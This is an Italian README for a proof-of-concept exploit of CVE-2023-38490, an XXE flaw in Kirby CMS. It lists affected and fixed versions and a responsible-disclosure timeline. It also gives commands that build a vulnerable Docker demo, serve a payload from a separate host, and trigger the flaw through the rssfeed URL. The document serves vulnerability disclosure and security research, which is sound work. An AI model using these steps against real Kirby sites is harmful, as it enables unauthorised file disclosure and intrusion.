Kirby XML External Entity (XXE) - CVE-2023-38490 exploit
Kirby < 3.9.6 Entità Esterna XML
Exploit per CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Dimostrazione dello sfruttamento
Build ed esegui l'app demo vulnerabile:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Servi il payload di esempio:
Nota: scegli un indirizzo di bind a cui il container docker possa accedere.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Attiva l'exploit:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
Come e perché funziona?
La funzione vulnerabile è presente in Kirby Core ma non è utilizzata per impostazione predefinita in Kirby Core, Kirby StarterKit o Kirby PlainKit. Ciò significa che la vulnerabilità non ti riguarderà nella configurazione predefinita, ma potrebbe essere introdotta con sviluppo personalizzato o installando un plugin che utilizza il toolkit interessato.
Per maggiori dettagli, leggi l'articolo dedicato (EN 🇬🇧 o FR 🇫🇷).
Riferimenti
- Software target: Kirby
- Homepage / Fornitore: https://getkirby.com/
- Codice sorgente:
- Versioni vulnerabili:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- Versioni corrette:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- Patch:
- Advisory:
Cronologia
- Settimana 24 - Lun, 12 Giu 2023: Vulnerabilità scoperta da Alexandre ZANNI (@noraj), Ingegnere di Penetration Testing presso ACCEIS.
- Settimana 24 - Mar, 13 Giu 2023: Vulnerabilità segnalata all'editore (Kirby) da Alexandre ZANNI
- Settimana 24 - Mer, 14 Giu 2023: Proof of Concept condiviso con l'editore (Kirby) da Alexandre ZANNI
- Settimana 24 - Mer, 14 Giu 2023: RFC 9116 security.txt aggiunto a getkirby.com
- Settimana 24 - Gio, 15 Giu 2023: Vulnerabilità confermata dall'editore (Kirby)
- Settimana 24 - Gio, 15 Giu 2023: Correzioni e patch programmate per il rilascio
- Settimana 26 - Gio, 29 Giu 2023: Vulnerabilità scoperta indipendentemente da Patrick FALB (@dapatrese) presso FORMER 03.
- Settimana 28 - Dom, 16 Lug 2023: Creazione di un advisory GitHub privato
- Settimana 29 - Dom, 23 Lug 2023: Richiesto ID CVE
- Settimana 29 - Dom, 23 Lug 2023: Vulnerabilità corretta dall'editore (Kirby)
- Settimana 30 - Lun, 24 Lug 2023: Alexandre ZANNI invitato all'advisory privato dall'editore (Kirby)
- Settimana 30 - Lun, 24 Lug 2023: Preparazione di un container docker demo vulnerabile da Alexandre ZANNI
- Settimana 30 - Lun, 24 Lug 2023: ID CVE CVE-2023-38490 registrato (riservato)
- Settimana 30 - Gio, 27 Lug 2023: Rilascio pubblico dell'advisory GitHub e delle patch
Dichiarazione di non responsabilità
ACCEIS non promuove né incoraggia alcuna attività illegale, tutto il contenuto fornito da questo repository è destinato esclusivamente a scopi di ricerca, educazione e rilevamento delle minacce.